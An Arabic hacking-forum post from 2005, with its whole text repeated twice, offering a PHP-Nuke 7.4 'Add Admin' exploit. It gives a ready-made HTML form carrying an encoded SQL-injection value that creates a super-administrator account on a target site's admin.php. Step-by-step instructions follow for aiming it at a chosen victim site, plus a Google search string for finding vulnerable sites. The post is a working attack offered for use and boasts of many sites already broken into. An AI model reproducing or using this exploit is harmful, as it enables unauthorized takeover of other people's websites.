BLak hand
09-03-2005, 11:34 PM
بسم الله الرحمن الرحيم
ياشباب معليش اذاماقدرت ارد على اقتحاتكم او انفذ طلباتكم لأن عندي ضغط كثير (3 منتديات)
وانشالله اقدر انفذ اوامركم واي سؤال او استفسار انا حاضر :biggthump واي طريقه انا جبتها او اكتشفتها
اضمنوها 100%100 لأني اجربها قبل ;)
http://67.19.93.12/0zz0.com/9/89198667.gif
اقدم لكم ثغره XSSPHP-Nuke 7.4 Add Admin الخطيره
وتم اختراق هذه الثغره بالعديد من المواقع
الشرح :-
ما عليك اخذ هاد الكود:-
كود:
<form name="mantra" method="POST" action="http://www.site name/admin.php"><p>USERNAME: <input type="text" name="add_aid" size="20">NOME: <input type="text" name="add_name" size="20">PASSWORD: <input type="text" name="add_pwd" size="20">E-MAIL: <input type="text" name="add_email" size="20"><input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox"><input type="hidden" name="add_radminsuper" value="1"><input type="hidden" name="op" value="AddAuthor"></p><p><input type="submit" name="Submit" value="Create Admin"></p></form>/
بدل كلمه (name) تحط اسم الموقع المراد اختراقه يكون بهذا الشكل www.nnn4 (http://www.nnn4/)
بعد ما تحط الكود فى Notepad تحول امتداد Notepad الى htm
اول ما تفتح الصفحه هتلاقى هذه المربعات
USERNAME: تكتب النك الي فيه ادمن
NOME:تكتب نكك مره ثانيه
E-MAIL:اكتب اي ايميل تبي
بعدين تضغط على Create Admin
وبعدها هتلاقى ادمن الموقع
ثانيا :-
كيفيه البحث عن المواقع المصابه بهذا الثغره
تفتح موقع جوجل www.google.com (http://www.google.com/)
وتكتب by PHP-Nuke. All Rights Reserved
وهكذا انتهاء الشرح يارب يكون عجبكم شرحى
مع تحيات اليد السوداء BLAK hAnD +_=
VvvV_DRAKOLA_VvvV@hotmail.com
ياشباب معليش اذاماقدرت ارد على اقتحاتكم او انفذ طلباتكم لأن عندي ضغط كثير (3 منتديات)
وانشالله اقدر انفذ اوامركم واي سؤال او استفسار انا حاضر :biggthump واي طريقه انا جبتها او اكتشفتها
اضمنوها 100%100 لأني اجربها قبل ;)
http://67.19.93.12/0zz0.com/9/89198667.gif
اقدم لكم ثغره XSSPHP-Nuke 7.4 Add Admin الخطيره
وتم اختراق هذه الثغره بالعديد من المواقع
الشرح :-
ما عليك اخذ هاد الكود:-
كود:
<form name="mantra" method="POST" action="http://www.site name/admin.php"><p>USERNAME: <input type="text" name="add_aid" size="20">NOME: <input type="text" name="add_name" size="20">PASSWORD: <input type="text" name="add_pwd" size="20">E-MAIL: <input type="text" name="add_email" size="20"><input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox"><input type="hidden" name="add_radminsuper" value="1"><input type="hidden" name="op" value="AddAuthor"></p><p><input type="submit" name="Submit" value="Create Admin"></p></form>/
بدل كلمه (name) تحط اسم الموقع المراد اختراقه يكون بهذا الشكل www.nnn4 (http://www.nnn4/)
بعد ما تحط الكود فى Notepad تحول امتداد Notepad الى htm
اول ما تفتح الصفحه هتلاقى هذه المربعات
USERNAME: تكتب النك الي فيه ادمن
NOME:تكتب نكك مره ثانيه
E-MAIL:اكتب اي ايميل تبي
بعدين تضغط على Create Admin
وبعدها هتلاقى ادمن الموقع
ثانيا :-
كيفيه البحث عن المواقع المصابه بهذا الثغره
تفتح موقع جوجل www.google.com (http://www.google.com/)
وتكتب by PHP-Nuke. All Rights Reserved
وهكذا انتهاء الشرح يارب يكون عجبكم شرحى
مع تحيات اليد السوداء BLAK hAnD +_=
VvvV_DRAKOLA_VvvV@hotmail.com